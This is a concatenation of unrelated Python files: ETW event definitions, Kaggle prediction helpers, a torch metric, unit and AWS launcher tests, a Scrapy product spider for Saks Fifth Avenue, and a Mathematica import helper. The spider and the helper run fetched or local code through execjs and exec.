"DestinationPort" / Int32ul,
"Protocol" / Int32ul,
"ReferenceContext" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=60103, version=0)
class Microsoft_Windows_OneX_60103_0(Etw):
pattern = Struct(
"IfGuid" / Guid,
"IfIndex" / Int32ul,
"IfLuid" / Int64ul,
"ReferenceContext" / Int32ul
)
|
import os
import numpy as np
import pandas as pd
def find_emb_dim(ratio, max_emb, data):
dim = round(np.unique(data).shape[0] * ratio)
if dim > max_emb:
return max_emb
else:
return dim
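# Illustrative example (assumed numbers): with ratio=0.5, max_emb=50 and a
# column holding 120 unique values, round(120 * 0.5) = 60 exceeds the cap,
# so find_emb_dim returns 50.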
def post_process(pred):
# simple post processing
if pred > 1:
return 1
elif pred < 0:
return 0
else:
return float(pred)
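# e.g. post_process(1.3) -> 1, post_process(-0.2) -> 0, post_process(0.4) -> 0.4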
def post_softmax(preds):
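    # placeholder: softmax post-processing is not implemented yet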
return None
def write_output(preds, conf):
    if not os.path.exists(conf.path.output_path):
        os.mkdir(conf.path.output_path)
    test = pd.read_csv(os.path.join(conf.path.input_path, "test.csv.zip"), nrows=conf.data_prep.nrows)
    sub = pd.DataFrame(test.item_id)
    sub["deal_probability"] = preds.flatten()
    sub.deal_probability = sub.deal_probability.map(post_process)
    print("writing submission csv...")
    sub_path = os.path.join(conf.path.output_path, "submission.csv")
    sub.to_csv(sub_path, index=False)
def plot_history(hist, conf, preds, target, save=False):
import matplotlib.pyplot as plt
import seaborn as sns
f, (ax1, ax2) = plt.subplots(1, 2, figsize = (12, 4))
ax1.plot(hist.history['rmse'], lw=2.0, color='b', label='train')
ax1.plot(hist.history['val_rmse'], lw=2.0, color='r', label='val')
ax1.set_title('CNN extra features')
ax1.set_xlabel('Epochs')
ax1.set_ylabel('rmse')
ax1.legend(loc='upper right')
ax2.plot(hist.history['loss'], lw=2.0, color='b', label='train')
ax2.plot(hist.history['val_loss'], lw=2.0, color='r', label='val')
ax2.set_title('CNN extra features')
ax2.set_xlabel('Epochs')
ax2.set_ylabel('loss')
ax2.legend(loc='upper right')
preds = preds.flatten()
f2, (ax1, ax2) = plt.subplots(1, 2, figsize = (12, 4))
    pp = np.vectorize(post_process)
    sns.distplot(preds, hist=True, label="preds", ax=ax1)
    sns.distplot(pp(preds), hist=True, label="preds", ax=ax2)
    sns.distplot(target, hist=True, label="train", ax=ax2)
ax1.set_title('Distri raw')
ax1.set_xlabel('n obs')
ax1.set_ylabel('proba')
ax2.set_title('Distri post')
ax2.set_xlabel('n obs')
ax2.set_ylabel('proba')
ax2.legend(loc='upper right')
if save:
f.savefig(os.path.join(conf.path.output_path, "training_plot.pdf"))
f2.savefig(os.path.join(conf.path.output_path, "dist_plot.pdf"))
else:
f.show()
f2.show() |
from torch import Tensor
import torch
from src.schema import Metric
def get_metric(query_set: Tensor, support_set: Tensor, metric: Metric) -> Tensor:
"""
run metrics with name
Args:
query_set: the train/input feature space from encoder
support_set: the support set feature space from encoder
metric: the name of metric distance algo
Returns: the loss between spaces
"""
if metric == Metric.L2:
return l2(query_set, support_set)
if metric == Metric.Cosine:
return cosine(query_set, support_set)
raise NotImplementedError(f'not supported metric<{metric}>')
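# Usage sketch (shapes are illustrative; Metric is the enum imported above):
#     query = torch.randn(4, 16)
#     support = torch.randn(4, 16)
#     get_metric(query, support, Metric.L2)      # elementwise squared differences
#     get_metric(query, support, Metric.Cosine)  # cosine similarity along the last dim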
def l2(x: Tensor, y: Tensor) -> Tensor:
return torch.pow(x - y, 2)
def cosine(x: Tensor, y: Tensor) -> Tensor:
return torch.cosine_similarity(x, y, dim=-1) |
import unittest
from pympcam.coralManager import CoralManager
class TestCoralManagerMethods(unittest.TestCase):
def setUp(self) -> None:
self.coral = CoralManager()
return super().setUp()
def test_on(self):
self.assertTrue(self.coral.turnOn())
def test_off(self):
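        # turnOff() has no documented return value; the test only checks it runs without raising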
self.coral.turnOff()
|
import pytest
import yaml
import launch
import launch.cli
import launch.config
import launch.util
import test_util.aws
def test_aws_cf_simple(check_cli_success, aws_cf_config_path):
"""Test that required parameters are consumed and appropriate output is generated
"""
info, desc = check_cli_success(aws_cf_config_path)
# check AWS specific info
assert 'stack_id' in info
assert info['ssh_private_key'] == launch.util.MOCK_SSH_KEY_DATA
# key should not have been generated
assert 'key_name' not in info['temp_resources']
def test_aws_zen_cf_simple(check_cli_success, aws_zen_cf_config_path):
"""Test that required parameters are consumed and appropriate output is generated
"""
info, desc = check_cli_success(aws_zen_cf_config_path)
# check AWS specific info
assert 'stack_id' in info
assert 'vpc' in info['temp_resources']
assert 'gateway' in info['temp_resources']
assert 'private_subnet' in info['temp_resources']
assert 'public_subnet' in info['temp_resources']
def mock_stack_not_found(*args):
raise Exception('Mock stack was not found!!!')
def test_missing_aws_stack(aws_cf_config_path, monkeypatch):
""" Tests that clean and appropriate errors will be raised
"""
monkeypatch.setattr(test_util.aws, 'fetch_stack', mock_stack_not_found)
config = launch.config.get_validated_config(aws_cf_config_path)
assert 'platform' in config, str(config.items())
aws_launcher = launch.get_launcher(config)
def check_stack_error(cmd, args):
with pytest.raises(launch.util.LauncherError) as exinfo:
getattr(aws_launcher, cmd)(*args)
assert exinfo.value.error == 'StackNotFound'
info = aws_launcher.create(config)
check_stack_error('wait', (info,))
check_stack_error('describe', (info,))
check_stack_error('delete', (info,))
check_stack_error('test', (info, 'py.test'))
def test_key_helper(aws_cf_config_path):
config = launch.config.get_validated_config(aws_cf_config_path)
aws_launcher = launch.get_launcher(config)
temp_resources = aws_launcher.key_helper(config)
assert temp_resources['key_name'] == config['deployment_name']
    assert yaml.safe_load(config['template_parameters'])['KeyName'] == config['deployment_name']
assert config['ssh_private_key'] == launch.util.MOCK_SSH_KEY_DATA
def test_zen_helper(aws_zen_cf_config_path):
config = launch.config.get_validated_config(aws_zen_cf_config_path)
aws_launcher = launch.get_launcher(config)
temp_resources = aws_launcher.zen_helper(config)
assert temp_resources['vpc'] == launch.util.MOCK_VPC_ID
assert temp_resources['gateway'] == launch.util.MOCK_GATEWAY_ID
assert temp_resources['private_subnet'] == launch.util.MOCK_SUBNET_ID
assert temp_resources['public_subnet'] == launch.util.MOCK_SUBNET_ID
    template_parameters = yaml.safe_load(config['template_parameters'])
assert template_parameters['Vpc'] == launch.util.MOCK_VPC_ID
assert template_parameters['InternetGateway'] == launch.util.MOCK_GATEWAY_ID
assert template_parameters['PrivateSubnet'] == launch.util.MOCK_SUBNET_ID
assert template_parameters['PublicSubnet'] == launch.util.MOCK_SUBNET_ID
|
"""
This package contains utilities and extensions for the Astropy sphinx
documentation. In particular, the `astropy.sphinx.conf` should be imported by
the sphinx ``conf.py`` file for affiliated packages that wish to make use of
the Astropy documentation format. Note that some sphinx extensions which are
bundled as-is (numpydoc and sphinx-automodapi) are included in
astropy_helpers.extern rather than astropy_helpers.sphinx.ext.
"""
__version__ = '1.0.dev0'
|
# -*- coding: utf-8 -*-
from scrapy.spiders import Spider
from scrapy.selector import Selector
from gorden_crawler.items import BaseItem, ImageItem, SkuItem, Color
from scrapy import Request
from scrapy_redis.spiders import RedisSpider
from gorden_crawler.spiders.shiji_base import BaseSpider
import logging
import re
import execjs
import json
import os
class SaksfifthavenueBaseSpider(object):
def handle_parse_item(self, response, item):
match = re.search(r'<script type\=\"application\/json\">({"ProductDetails".+?)<\/script>', response.body)
        sel = Selector(response)
        if match is None:
            return
        logging.debug(match.group(1))
context = execjs.compile('''
var json = %s
function getJson(){
return json;
}
''' % match.group(1))
product_json = context.call('getJson')
main_product = product_json['ProductDetails']['main_products'][0]
item['brand'] = main_product['brand_name']['label']
item['title'] = main_product['short_description']
show_product_id = main_product['product_code']
item['show_product_id'] = show_product_id
item['desc'] = main_product['description']
list_price = main_product['price']['list_price']['usd_currency_value']
        if re.findall('\-', list_price):
            item['list_price'] = re.search('([\d\.]+)\s*\-', list_price).group(1)
        else:
            item['list_price'] = list_price
sale_price = main_product['price']['sale_price']['usd_currency_value']
        if re.findall('\-', sale_price):
            item['current_price'] = re.search('([\d\.]+)\s*\-', sale_price).group(1)
        else:
            item['current_price'] = sale_price
item['dimensions'] = ['size']
skus = []
sizes = {}
sizes['size'] = []
color_names = []
colors = main_product['colors']['colors']
handle_color_map = {}
if len(colors) > 0:
for color in colors:
handle_color_map[color['id']] = color['label']
handle_size_map = {}
if len(main_product['sizes']['sizes']) == 0:
sizes['size'].append('onesize')
else:
for size in main_product['sizes']['sizes']:
handle_size_map[size['id']] = size['value']
sizes['size'].append(size['value'])
image_prefix = 'http:' + main_product['media']['images_server_url'] + main_product['media']['images_path']
if len(colors) == 0:
color_name = 'onecolor'
color_names.append(color_name)
common_images = main_product['media']['images']
images = []
for common_image in common_images:
imageItem = ImageItem()
imageItem['image'] = image_prefix + common_image + '?wid=970&hei=1293&fmt=jpg'
imageItem['thumbnail'] = image_prefix + common_image + '?wid=396&hei=528&fmt=jpg'
images.append(imageItem)
first_thumbnail = images[0]['thumbnail']
colorItem = Color()
colorItem['type'] = 'color'
colorItem['from_site'] = item['from_site']
colorItem['show_product_id'] = item['show_product_id']
colorItem['images'] = images
colorItem['name'] = color_name
colorItem['cover'] = first_thumbnail
colorItem['version'] = '1'
yield colorItem
else:
common_images = main_product['media']['images']
for color in colors:
color_name = color['label']
color_names.append(color_name)
images = []
imageItem = ImageItem()
imageItem['image'] = image_prefix + color['colorize_image_url'] + '?wid=970&hei=1293&fmt=jpg'
imageItem['thumbnail'] = image_prefix + color['colorize_image_url'] + '?wid=396&hei=528&fmt=jpg'
images.append(imageItem)
first_thumbnail = images[0]['thumbnail']
for common_image in common_images:
imageItem = ImageItem()
imageItem['image'] = image_prefix + common_image + '?wid=970&hei=1293&fmt=jpg'
imageItem['thumbnail'] = image_prefix + common_image + '?wid=396&hei=528&fmt=jpg'
images.append(imageItem)
colorItem = Color()
colorItem['type'] = 'color'
colorItem['from_site'] = item['from_site']
colorItem['show_product_id'] = item['show_product_id']
colorItem['images'] = images
colorItem['name'] = color_name
colorItem['version'] = '1'
if len(color['value']) > 0:
if re.findall('\#', color['value']):
colorItem['cover_style'] = color['value']
else:
cover_img_str = sel.xpath('//li[@class="product-color-options__value" and @data-colorid=' + str(color["id"]) + ']/@style').extract()
cover_unavi_str = sel.xpath('//li[@class="product-color-options__value product-color-options__value--unavailable" and @data-colorid=' + str(color["id"]) + ']/@style').extract()
cover_sel_str = sel.xpath('//li[@class="product-color-options__value product-color-options__value--selected" and @data-colorid=' + str(color["id"]) + ']/@style').extract()
cover_hid_str = sel.xpath('//li[@class="product-color-options__value is-hidden" and @data-colorid=' + str(color["id"]) + ']/@style').extract()
if len(cover_img_str)>0:
cover_img = re.search('\((.+)\)', cover_img_str[0]).group(1)
colorItem['cover'] = 'http:' + cover_img
elif len(cover_unavi_str)>0:
cover_img_str = cover_unavi_str[0]
cover_img = re.search('\((.+)\)', cover_img_str).group(1)
colorItem['cover'] = 'http:' + cover_img
elif len(cover_sel_str)>0:
cover_img_str = cover_sel_str[0]
cover_img = re.search('\((.+)\)', cover_img_str).group(1)
colorItem['cover'] = 'http:' + cover_img
elif len(cover_hid_str)>0:
cover_img_str = cover_hid_str[0]
cover_img = re.search('\((.+)\)', cover_img_str).group(1)
colorItem['cover'] = 'http:' + cover_img
else:
colorItem['cover'] = first_thumbnail
else:
colorItem['cover'] = first_thumbnail
yield colorItem
item['colors'] = color_names
for sku in main_product['skus']['skus']:
sku_id = sku['sku_id']
if sku_id == 'DUMMY':
continue
if sku['color_id'] == -1:
color_name = 'onecolor'
else:
color_name = handle_color_map[sku['color_id']]
if sku['size_id'] == -1:
size = 'onesize'
else:
size = handle_size_map[sku['size_id']]
skuItem = SkuItem()
skuItem['type'] = 'sku'
skuItem['show_product_id'] = item['show_product_id']
skuItem['from_site'] = item['from_site']
skuItem['id'] = sku_id
skuItem['size'] = size
skuItem['color'] = color_name
if sku['status_alias'] == 'soldout' or sku['status_alias'] == 'waitlist':
skuItem['is_outof_stock'] = True
else:
skuItem['is_outof_stock'] = False
if len(sku['price']['sale_price']['usd_currency_value']) > 0:
skuItem['current_price'] = sku['price']['sale_price']['usd_currency_value']
else:
continue
if len(sku['price']['list_price']['usd_currency_value']) > 0:
skuItem['list_price'] = sku['price']['list_price']['usd_currency_value']
else:
continue
skus.append(skuItem)
item['sizes'] = sizes
item['skus'] = skus
        if main_product['size_guide_link']['enabled']:
sizeInfo = main_product['size_guide_link']['url']
findQ = sizeInfo.find("?")
if findQ != -1:
item['size_info'] = sizeInfo[:findQ]
else:
item['size_info'] = sizeInfo
yield item
# def handle_parse_item(self,response,item):
# sel = Selector(response)
# if len(sel.xpath('//div[contains(@class, "main-product")]//div[contains(@class, "sold-out-message")]').extract()) > 0:
# return
#
# jsonStr = "".join(re.findall(r'<script type="text/javascript">[\s]*(var mlrs = .*)[\s]*</script>', response.body))
#
# if jsonStr == '':
# if os.environ.get('item_update_notify_redis') == 'True':
# logging.warning('old')
#
# detail_block = sel.xpath('//div[re:test(@class, "\s*pdp-item-container clearfix\s*$")]')
#
# item['brand'] = detail_block.xpath('.//h1[@class="brand"]/text()').extract()[0]
# title = detail_block.xpath('.//h2[@class="description"]/text()').extract()
# if len(title) > 0:
# item['title'] = title[0]
# else:
# item['title'] = item['brand']
#
# item['show_product_id'] = detail_block.xpath('.//h3[@class="product-code-reskin"]/text()').extract()[0]
# item['desc'] = detail_block.xpath('.//span[@class="pdp-reskin-detail-content"]').extract()[0]
#
# list_price = detail_block.xpath('.//span[@class="product-price"]/text()').re(r'^\s*\$([\d\.]+)')[0]
#
# sale_price = detail_block.xpath('.//span[@class="product-sale-price"]/text()').re(r'^\s*\$([\d\.]+)')
# if len(sale_price) > 0:
# current_price = sale_price[0]
# else:
# current_price = list_price
#
# item['current_price'] = current_price
# item['list_price'] = list_price
#
# item['dimensions'] = ['size']
# skus = []
# sizes = {}
# sizes['size'] = []
# color_names = []
#
# options = detail_block.xpath('//select[@productcode="' + item['show_product_id'] + '"]/option')
#
# if len(options) > 0:
# for option in options:
#
# sku_id = option.xpath('./@value').extract()[0]
#
# if sku_id == '0':
# continue
#
# skuItem = SkuItem()
# skuItem['type'] = 'sku'
# skuItem['show_product_id'] = item['show_product_id']
# skuItem['from_site'] = item['from_site']
# skuItem['id'] = sku_id
#
# size = option.xpath('./@data-product-size').extract()[0]
# if size == '.' or size == 'NO SIZE':
# size = 'onesize'
# skuItem['size'] = size
# if size not in sizes['size']:
# sizes['size'].append(size)
#
# color = option.xpath('./@data-colorname').extract()[0]
# if color == 'NO COLOR':
# color = 'onecolor'
#
# skuItem['color'] = color
# if color not in color_names:
# color_names.append(color)
#
# is_outof_stock = False
# wait_list = option.xpath('./@data-waitlist')
# if len(wait_list) > 0:
# if wait_list.extract()[0] == "true":
# is_outof_stock = True
#
# skuItem['is_outof_stock'] = is_outof_stock
# skuItem['current_price'] = item['current_price']
# skuItem['list_price'] = item['list_price']
#
# skus.append(skuItem)
# else:
# sku_id = sel.xpath('//div[@id="pdSizeColor--MainProductqtyToBuy0"]/input[@name="ADD_CART_ITEM_ARRAY<>sku_id"]/@value').extract()[0]
#
# skuItem = SkuItem()
# skuItem['type'] = 'sku'
# skuItem['show_product_id'] = item['show_product_id']
# skuItem['from_site'] = item['from_site']
# skuItem['id'] = sku_id
#
# skuItem['size'] = 'onesize'
# sizes['size'].append('onesize')
#
# skuItem['color'] = 'onecolor'
# color_names.append('onecolor')
#
# skuItem['current_price'] = item['current_price']
# skuItem['list_price'] = item['list_price']
# skuItem['is_outof_stock'] = False
#
# skus.append(skuItem)
#
# item['skus'] = skus
# item['sizes'] = sizes
#
# item['colors'] = []
# select_colors = detail_block.xpath('.//div[@class="product-swatches-container"]')
# if len(select_colors) > 0:
# color_lis = detail_block.xpath('.//div[@class="product-swatches-container"]//ul/li')
#
# for color_li in color_lis:
#
# color_div = color_li.xpath('.//div[@class="swatch-thumbnail"]')
#
# image_url = color_div.xpath('./@data-url').extract()[0]
# color_name = color_div.xpath('./@data-color').extract()[0]
#
# item['colors'].append(color_name)
#
# imageItem = ImageItem()
# imageItem['thumbnail'] = "http://image.s5a.com/is/image/" + image_url + '_247x329.jpg'
# imageItem['image'] = "http://image.s5a.com/is/image/" + image_url + '_396x528.jpg'
#
# colorItem = Color()
#
# colorItem['type'] = 'color'
# colorItem['from_site'] = item['from_site']
# colorItem['show_product_id'] = item['show_product_id']
# colorItem['images'] = [imageItem]
# colorItem['name'] = color_name
#
# color_style = color_div.xpath('./@style')
#
# if len(color_style) > 0:
# colorItem['cover_style'] = color_style.re(r'background-color:(.+);')[0]
# if '#' not in colorItem['cover_style']:
# colorItem['cover_style'] = '' + colorItem['cover_style']
# else:
# colorItem['cover'] = imageItem['thumbnail']
#
# yield colorItem
# else:
# color_name = color_names[0]
#
# item['colors'].append(color_name)
#
# imageItem = ImageItem()
# imageItem['thumbnail'] = "http://image.s5a.com/is/image/saks/" + item['show_product_id'] + '_247x329.jpg'
# imageItem['image'] = "http://image.s5a.com/is/image/saks/" + item['show_product_id'] + '_396x528.jpg'
#
# colorItem = Color()
#
# colorItem['type'] = 'color'
# colorItem['from_site'] = item['from_site']
# colorItem['show_product_id'] = item['show_product_id']
# colorItem['images'] = [imageItem]
# colorItem['name'] = color_name
# colorItem['cover'] = imageItem['thumbnail']
#
# yield colorItem
#
# size_info_div = detail_block.xpath('.//div[@class="size-additional-info"]/a/@href').re(r'\'(http://.+)\',')
#
# if len(size_info_div) > 0:
# size_info = size_info_div[0]
# findQ = size_info.find("?")
# if findQ != -1:
# item['size_info'] = size_info[:findQ]
# else:
# item['size_info'] = size_info
#
# yield item
#
# else:
# context = execjs.compile('''
# %s
# function getMlrs(){
# return mlrs;
# }
# ''' % jsonStr)
#
# mlrs = context.call('getMlrs')
#
#
# item['brand'] = mlrs['response']['body']['main_products'][0]['brand_name']['label']
# item['title'] = mlrs['response']['body']['main_products'][0]['short_description']
# if item['title'] == '':
# item['title'] = item['brand']
# item['show_product_id'] = mlrs['response']['body']['main_products'][0]['product_code']
# item['desc'] = mlrs['response']['body']['main_products'][0]['description']
# find = mlrs['response']['body']['main_products'][0]['price']['sale_price'].find(" - ")
# if find != -1:
# item['current_price'] = mlrs['response']['body']['main_products'][0]['price']['sale_price'][:find].replace("$",'')
# else:
# item['current_price'] = mlrs['response']['body']['main_products'][0]['price']['sale_price'].replace("$",'')
#
# find2 = mlrs['response']['body']['main_products'][0]['price']['list_price'].find(" - ")
# if find2 != -1:
# item['list_price'] = mlrs['response']['body']['main_products'][0]['price']['list_price'][find2+3:].replace("$",'')
# else:
# item['list_price'] = mlrs['response']['body']['main_products'][0]['price']['list_price'].replace("$",'')
#
# colors = {}
# item['colors'] = []
# if len(mlrs['response']['body']['main_products'][0]['colors']['colors']) > 0:
# for color in mlrs['response']['body']['main_products'][0]['colors']['colors']:
# colors[color['color_id']] = color['label']
# item['colors'].append(color['label'])
# imageItem = ImageItem()
# imageItem['thumbnail'] = "http:" + mlrs['response']['body']['main_products'][0]['media']['images_server_url'] + "is/image/" + color['colorized_image_url'] + '_247x329.jpg'
# imageItem['image'] = "http:" + mlrs['response']['body']['main_products'][0]['media']['images_server_url'] + "is/image/" + color['colorized_image_url'] + '_396x528.jpg'
#
# colorItem = Color()
# colorItem['type'] = 'color'
# colorItem['from_site'] = item['from_site']
# colorItem['show_product_id'] = item['show_product_id']
# colorItem['images'] = [imageItem]
# colorItem['name'] = color['label']
# if color['value'] != '':
# colorItem['cover_style'] = '#' + color['value']
# else:
# colorItem['cover'] = imageItem['thumbnail']
#
# yield colorItem
# else:
# colors[-1] = 'onecolor'
# item['colors'].append('onecolor')
# imageItem = ImageItem()
# imageItem['thumbnail'] = "http:" + mlrs['response']['body']['main_products'][0]['media']['images_server_url'] + mlrs['response']['body']['main_products'][0]['media']['images']['product_array_image']
# imageItem['image'] = "http:" + mlrs['response']['body']['main_products'][0]['media']['images_server_url'] + mlrs['response']['body']['main_products'][0]['media']['images']['product_detail_image']
#
# colorItem = Color()
# colorItem['type'] = 'color'
# colorItem['from_site'] = item['from_site']
# colorItem['show_product_id'] = item['show_product_id']
# colorItem['images'] = [imageItem]
# colorItem['name'] = 'onecolor'
# yield colorItem
#
# item['dimensions'] = ['size']
# sizes = {}
# item['sizes'] = []
# if len(mlrs['response']['body']['main_products'][0]['sizes']['sizes']) > 0:
# for size in mlrs['response']['body']['main_products'][0]['sizes']['sizes']:
# sizes[size['size_id']] = size['value']
# item['sizes'].append(size['value'])
# else:
# sizes[-1] = 'onesize'
# item['sizes'].append('onesize')
#
# item['skus'] = []
# for sku in mlrs['response']['body']['main_products'][0]['skus']['skus']:
# if sku['color_id'] in colors.keys() and sku['size_id'] in sizes.keys():
# skuItem = {}
# skuItem['type'] = 'sku'
# skuItem['show_product_id'] = item['show_product_id']
# skuItem['id'] = sku['sku_id']
# skuItem['list_price'] = sku['price']['list_price'].replace("$",'')
# skuItem['current_price'] = sku['price']['sale_price'].replace("$",'')
# skuItem['color'] = colors[sku['color_id']]
# skuItem['size'] = sizes[sku['size_id']]
#
# skuItem['from_site'] = item['from_site']
# skuItem['is_outof_stock'] = False if sku['status_alias'] == 'available' else True
# item['skus'].append(skuItem)
#
# if mlrs['response']['body']['main_products'][0]['size_guide_link']['enabled']:
# sizeInfo = mlrs['response']['body']['main_products'][0]['size_guide_link']['url']
# findQ = sizeInfo.find("?")
# if findQ != -1:
# item['size_info'] = sizeInfo[:findQ]
# else:
# item['size_info'] = sizeInfo
#
# yield item
class SaksfifthavenueSpider(BaseSpider,SaksfifthavenueBaseSpider):
name = "saksfifthavenue"
allowed_domains = ["saksfifthavenue.com"]
custom_settings = {
#'USER_AGENT': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36',
'DOWNLOAD_DELAY': 0.5,
'DOWNLOAD_TIMEOUT': 30,
'RETRY_TIMES': 20,
'DOWNLOADER_MIDDLEWARES': {
#'gorden_crawler.middlewares.MyCustomDownloaderMiddleware': 543,
'scrapy.downloadermiddleware.useragent.UserAgentMiddleware': None,
'gorden_crawler.contrib.downloadmiddleware.rotate_useragent.RotateUserAgentMiddleware':1,
'gorden_crawler.middlewares.proxy_ats.ProxyMiddleware': 100,
# 'scrapy.downloadermiddlewares.httpproxy.HttpProxyMiddleware': 110,
}
}
    # In production runs start_urls is empty; the spider is fed URLs via redis
start_urls = [
'http://www.saksfifthavenue.com',
]
base_url = 'http://www.saksfifthavenue.com'
    # Entry point of the spider: parses the initial request; each request corresponds to one top-level category
def start_requests(self):
for url in self.start_urls:
yield Request(url)
def parse(self, response):
sel = Selector(response)
navDom = sel.xpath(".//div[@class='nav']/ul/li")
navStandard = {
'WomensApparelNavMenu':{'gender':'women', 'product_type':'clothing'},
'ShoesNavMenu':{'gender':'women', 'product_type':'shoes'},
'HandbagsNavMenu':{'gender':'women', 'product_type':'bags'},
'JewelryAccessoriesNavMenu':{'gender':'women', 'product_type':'accessories'},
'TheMensStoreNavMenu':{'gender':'men', 'product_type':'clothing'},
'JustKidsNavMenu':{'gender':'baby', 'product_type':'mother&baby'},
'SaksBeautyPlaceNavMenu':{'gender':'women', 'product_type':'beauty'}
}
for nav in navDom:
navId = nav.xpath("./@id").extract()[0]
if navId in navStandard.keys():
if navId == 'HandbagsNavMenu' or navId == 'JewelryAccessoriesNavMenu':
menuDom = nav.xpath(".//ul[@class='sub-menu']/li[2]/ul[1]/li")
for dom in menuDom:
category = dom.xpath("./a/text()").extract()[0]
if category not in ['Shop All','New Arrivals','Best Sellers']:
url = dom.xpath("./a/@href").extract()[0]
yield Request(url, callback=self.parse_list, meta={"category_url":url, "category":category, "gender":navStandard[navId]['gender'], "product_type":navStandard[navId]['product_type']})
elif navId == 'TheMensStoreNavMenu':
menuDom = nav.xpath(".//ul[@class='sub-menu']/li[2]/ul[1]/li")
for dom in menuDom:
category = dom.xpath("./a/text()").extract()[0]
if category not in ['Shop All','New Arrivals','Best Sellers']:
url = dom.xpath("./a/@href").extract()[0]
yield Request(url, callback=self.parse_list, meta={"category_url":url, "category":category, "gender":navStandard[navId]['gender'], "product_type":'shoes'})
menuDom = nav.xpath(".//ul[@class='sub-menu']/li[2]/ul[2]/li")
for dom in menuDom:
category = dom.xpath("./a/text()").extract()[0]
if category not in ['Shop All','New Arrivals','Best Sellers']:
url = dom.xpath("./a/@href").extract()[0]
yield Request(url, callback=self.parse_list, meta={"category_url":url, "category":category, "gender":navStandard[navId]['gender'], "product_type":'accessories'})
elif navId == 'JustKidsNavMenu':
menuDom = nav.xpath(".//ul[@class='sub-menu']/li[1]/ul[2]/li")
for dom in menuDom:
category = dom.xpath("./a/text()").extract()[0]
if category not in ['Shop All','New Arrivals','Best Sellers']:
url = dom.xpath("./a/@href").extract()[0]
gender = 'toddler' if category == 'Girls (2-6)' else 'girls'
yield Request(url, callback=self.parse_list, meta={"category_url":url, "category":category, "gender":gender, "product_type":navStandard[navId]['product_type']})
menuDom = nav.xpath(".//ul[@class='sub-menu']/li[1]/ul[3]/li")
for dom in menuDom:
category = dom.xpath("./a/text()").extract()[0]
if category not in ['Shop All','New Arrivals','Best Sellers']:
url = dom.xpath("./a/@href").extract()[0]
gender = 'toddler' if category == 'Boys (2-6)' else 'boys'
yield Request(url, callback=self.parse_list, meta={"category_url":url, "category":category, "gender":gender, "product_type":navStandard[navId]['product_type']})
elif navId == 'SaksBeautyPlaceNavMenu':
menuDom = nav.xpath(".//ul[@class='sub-menu']/li[1]/ul[3]/li")
for dom in menuDom:
category = dom.xpath("./a/text()").extract()[0]
if category not in ['Shop All','New Arrivals','Best Sellers']:
url = dom.xpath("./a/@href").extract()[0]
gender = 'women'
yield Request(url, callback=self.parse_list, meta={"category_url":url, "category":category, "gender":gender, "product_type":navStandard[navId]['product_type']})
menuDom = nav.xpath(".//ul[@class='sub-menu']/li[2]/ul[1]/li")
for dom in menuDom:
category = dom.xpath("./a/text()").extract()[0]
if category not in ['Shop All','New Arrivals','Best Sellers']:
url = dom.xpath("./a/@href").extract()[0]
gender = 'men'
yield Request(url, callback=self.parse_list, meta={"category_url":url, "category":category, "gender":gender, "product_type":navStandard[navId]['product_type']})
else:
menuDom = nav.xpath(".//ul[@class='sub-menu']/li[1]/ul[1]/li")
for dom in menuDom:
category = dom.xpath("./a/text()").extract()[0]
if category not in ['Shop All', 'New Arrivals', 'Best Sellers', 'Special Offers','Bag Accessories']:
url = dom.xpath("./a/@href").extract()[0]
yield Request(url, callback=self.parse_list, meta={"category_url": url, "category": category, "gender": navStandard[navId]['gender'], "product_type": navStandard[navId]['product_type']})
def parse_list(self, response):
category = response.meta['category']
gender = response.meta['gender']
product_type = response.meta['product_type']
category_url = response.meta['category_url']
sel = Selector(response)
# if len(sel.xpath(".//div[@id='pc-top']/div[1]/span[1]/text()").extract()) == 0:
# return
listDom = sel.xpath(".//*[@id='product-container']/div[@class!='pa-row-spacer' and @class!='clear']")
if len(listDom.extract()) > 0:
for dom in listDom:
item = BaseItem()
item['from_site'] = 'saksfifthavenue'
item['type'] = 'base'
item['category'] = category
item['product_type'] = product_type
item['gender'] = gender
# item['title'] = dom.xpath("./div[@class='product-text']//p[@class='product-description']/text()").extract()[0]
# item['brand'] = dom.xpath("./div[@class='product-text']//span[@class='product-designer-name']/text()").extract()[0]
# item["show_product_id"] = dom.xpath("./div[@class='product-text']/a/p[1]/@productcode").extract()[0]
# item['cover'] = dom.xpath("./div[@class='sfa-pa-product-swatches-container']/div[1]/img/@data-src").extract()[0]
pid = dom.xpath("./div[@class='image-container-large']/a[1]/@name").extract()[0]
item['cover'] = dom.xpath("./div[@class='image-container-large']/a[@id='image-url-" + pid +"']/img[last()]/@src").extract()[0]
item["url"] = url = dom.xpath("./div[@class='product-text']/a/@href").extract()[0]
yield Request(url, callback=self.parse_item, meta={"item": item})
if len(sel.xpath(".//*[@id='pc-top']/ol//a[@class='page-selected']/text()")) == 0:
currentPage = 1
else:
currentPage = sel.xpath(".//*[@id='pc-top']/ol//a[@class='page-selected']/text()").extract()[0]
countStr = sel.xpath(".//div[@id='pc-top']/div[1]/span[1]/text()").extract()[0]
countTotal = int(countStr.replace(',','').replace('.','').replace(' ',''))
        lastPage = countTotal // 60 + 1 if countTotal % 60 > 0 else countTotal // 60
if int(currentPage) < int(lastPage):
list_more_url = category_url + '&Nao=' + str((int(currentPage))*60)
yield Request(list_more_url, callback=self.parse_list, meta={"category":category, "product_type":product_type,"gender":gender, "category_url":category_url})
else:
return
def parse_item(self, response):
item = response.meta['item']
return self.handle_parse_item(response, item)
def handle_parse_item(self, response, item):
return SaksfifthavenueBaseSpider.handle_parse_item(self, response, item) |
"""This defines a quick I/O framework for importing from Mathematica
"""
from __future__ import print_function
import os
mathematica_type_importers = {}
def mathematica_default_import(i_dict):
return i_dict["ImportValue"]
def mathematica_register_type_importer(t, f):
mathematica_type_importers[t] = f
mathematica_importer_dir = os.path.join(os.path.dirname(__file__), "importers")
def mathematica_load_importer(m_typ):
if m_typ not in mathematica_type_importers:
m_path = os.path.join(
mathematica_importer_dir,
m_typ+".py"
        )
        if os.path.exists(m_path):
            with open(m_path) as imp_file:
                exec(imp_file.read())
if m_typ in mathematica_type_importers:
m_importer = mathematica_type_importers[m_typ]
else:
m_importer = mathematica_default_import
return m_importer
def _mathematica_import_core(i_dict):
imp = mathematica_load_importer(i_dict["ImportType"])
return imp(i_dict)
def mathematica_import(i_dict):
imp_data = _mathematica_import_core(i_dict)
return imp_data
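# Usage sketch: with no importer registered for a type, the default importer
# simply returns the "ImportValue" entry of the dict, e.g.
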